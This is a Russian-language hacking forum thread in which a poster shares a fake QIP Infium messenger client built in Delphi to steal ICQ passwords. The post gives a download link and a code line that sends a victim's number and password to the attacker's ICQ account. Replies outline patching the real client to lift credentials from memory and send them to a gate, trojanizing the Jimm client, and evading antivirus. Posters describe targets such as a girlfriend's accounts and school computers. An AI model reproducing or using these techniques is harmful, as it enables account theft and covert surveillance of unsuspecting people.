Просмотр полной версии : Фейк QIP'a_Infium [Delphi]
_GlaD1aT(OR)_
03.08.2008, 16:00
Фейк QIP'a_Infium для взлома
http://s46.radikal.ru/i113/0808/01/b1542bf54aae.jpg (http://www.radikal.ru)
Выкладываю фейк QIP_Infium. Все нестандартные компоненты в архиве. Редактируйте на свой вкус. (Сделан как и Фейк Mail@Агент (http://forum.antichat.ru/thread79328.html) ). Минус только в том, что я не нашел нормальной иконки QIP'a Infium, так что если у кого найдется, пусть выложит иконку сюда и не смог сделать что-бы место для ввода паролей выводило кружочки, получились только '*'. В общем юзайте :) Help в архиве
В компоненте icqclient (Object Inspector) укажите другой номер и пароль, записав в UIN и Password - это номер с которого будет слаться отчёт. А в строке
icqclient1.SendMessage(368368456, 'ICQ: ' + ComboBox1.Text + ' Password: ' + Edit2.Text);
368368456 - это на какой номер оташлется отчет.
Ссылка для скачивания (http://depositfiles.com/files/6964626)
PandoraBox
03.08.2008, 16:08
я его уже кажись выкладывал давно или это полный с окном коннекта и чатом?
_GlaD1aT(OR)_
03.08.2008, 16:23
Не, это мой. Сегодня написал, а на свой ссылку дай если помнишь
PandoraBox
03.08.2008, 16:24
http://forum.inattack.ru/index.php?showtopic=10798&st=0&gopid=97474&
_GlaD1aT(OR)_
03.08.2008, 16:27
Не, у меня просто окно фейк. А че то я скачать не могу...
А вообще если нормально делать, то лучше (НА примере обычной Qip)
1) Снимаешь проверку Crc
2) через декомпилятор смотришь адрес обработчика нажатия на кнопку Подключиться и пербиваешь свой обработчик.
3) приделываешь к Qip небольшой код который выдерит логин и пас из оперативы и отошлет на гейт. и обратно возвращаешься на код обработчика
Больше ничего не нужно и всё будет пахать на ура. Да и максимум на создание такого твариния потратится пол дня (если конечно ассемблер знаешь (\\\ехидно улыбнулся\\))
_GlaD1aT(OR)_
04.08.2008, 15:23
Зная Delphi, Pascal, C++, HTML, PHP, но ассемблер не знаю. Скоро на Delphi закончу
0verbreaK
04.08.2008, 21:36
slesh прям мои мысли читаешь :)
Имхо, сама идея с фейками (мейл-агент, квип и т.д.) нереентабельна. Человек, дорожащий своей информацией или владеющий красивым 5-6 знаком, будет скачивать квип только с офф. сайта. /а мейл-агенту вообще место в биореакторе/
_GlaD1aT(OR)_
05.08.2008, 04:02
Программа предназначина для взлома мыла/аси девушки или просто над другом поприкалываться. Да, ты прав, тут ты 5* не выловишь
_GlaD1aT(OR)_
05.08.2008, 10:40
http://forum.inattack.ru/index.php?showtopic=10798&st=0&gopid=97474&
Прога класс, автору респект :)
А разве это не у тебя сплагиатченно?!
В настоящее время с вашего Ip адреса уже идет скачивание.
В бесплатном режиме Вы не можете скачивать более одного файла одновременно.
Кто может перезалить!?
Имхо, сама идея с фейками (мейл-агент, квип и т.д.) нереентабельна. Человек, дорожащий своей информацией или владеющий красивым 5-6 знаком, будет скачивать квип только с офф. сайта. /а мейл-агенту вообще место в биореакторе/
Пизд*жь и провокация ... у примеру у меня зарадминено 40 компов... и что бы узнать чей то пасс от агента etc...
это самый лучший способ....
Да бля.... элементарно впарить девушке в самый раз.. как 2 пальца....
slider
Пизд*жь и провокация ... Имхо
у примеру у меня зарадминено 40 компов... Наверно это круто...
и что бы узнать чей то пасс от агента etc... это самый лучший способ.... для кого как, мне проще считать поксоренный пасс агента из реестра, чем тащить несколько метров софта на компьютер пользователя и палиться перед проактивками при подмене файла.
Да бля.... элементарно впарить девушке в самый раз.. как 2 пальца.... Это уже совсем абсурдно, зачем у бедной девушке воровать пароль? Если только использовать фейк для чтения переписки...
Имхо
Нет ..это имхо....
Наверно это круто...
очень...
для кого как, мне проще считать поксоренный пасс агента из реестра, чем тащить несколько метров софта на компьютер пользователя и палиться перед проактивками при подмене файла.
И поксоренный пасс квипа тож?
Проактивки молчат.... никакого палева...
Какие несколько метров???
кб 200 от силы....
Это уже совсем абсурдно, зачем у бедной девушке воровать пароль? Если только использовать фейк для чтения переписки..
Сам ответил на свой вопрос...
_GlaD1aT(OR)_
05.08.2008, 17:36
Спидер, я сам писал, там ничего сложного нет при его написании...
Exile1985
06.08.2008, 16:36
Этот исходник не смотрел, и как то влом смотреть после фразы про то что этот "фейк" сделан так же как и Фейк Mail@Агент, т.к. в предыдущем проекте ты бы хотя бы удосужился дописать его, т.к. в том проекте я не нашел не единой строчки запускающей реальный MainAgent, малотчик ничего не скажу, норм постарался, сделал форму один в один с оригиналом но неплохо было бы если бы ты еще программно заполнял поля в рельном майл агенте, предварительно его запустив и переместив его окно за пределы видимости, чтоб уж палева никакого не было, а так.... мля доделывай
_GlaD1aT(OR)_
07.08.2008, 02:56
Ага
а есть такая прога на телефон???
а есть такая прога на телефон???
Можешь разобрать Jimm, вписать свой хост и дать этот Jimm жертве, как тока жертва впишет лог и пас-уин твой!
Кстати, никто не знает, есть ли уже фейк квипа который тырит пасы и продолжает работу как обычный квип?
_GlaD1aT(OR)_
29.09.2008, 06:32
Можешь разобрать Jimm, вписать свой хост и дать этот Jimm жертве, как тока жертва впишет лог и пас-уин твой!
Кстати, никто не знает, есть ли уже фейк квипа который тырит пасы и продолжает работу как обычный квип?
Врят ли в паблике есть, что-бы его сделать уйдет очень много времени
Я в своё время пол школы таким образом крякнул)))))))))))))
ЗЫ школа была не моя и выпуск у меня уже я типо ничго не боялся)
хай гладиатор сори что не потеме стуни мне в асю 47-86-98
есть тема можно много бабла заработать(если есть желание стуки)
procedure
10.11.2008, 09:24
На qip.ru куча xss, но если постараться можно найти что нибудь получше. И я думаю, если еще сильнее постараться.....можно найти масштабное применение данному фейку...
_GlaD1aT(OR)_
10.11.2008, 13:43
Тема уже неактуальна, пожалуйста закройте её, ибо и так флуда много
PandoraBox
10.11.2008, 22:32
заметил что квип инфиум всю инфу и пароли сохраняет на сервер qip.ru палево =\
А я так скачаю чисто из-за компонента ICQ :)
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot